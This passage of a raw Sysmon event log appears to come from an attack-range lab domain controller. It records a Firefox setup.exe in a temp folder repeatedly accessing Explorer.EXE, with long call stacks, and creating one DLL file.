8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\IA2Marshal.dll2021-01-18 13:59:52.349 10341000x800000000000000014871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
